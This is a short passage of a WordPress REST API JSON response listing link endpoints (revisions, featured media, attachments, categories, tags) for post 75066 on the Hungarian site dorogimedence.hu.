ersion-history":[{"count":0,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/75066\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media\/75067"}],"wp:attachment":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media?parent=75066"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/categories?post=75066"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/tags?post=75066"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}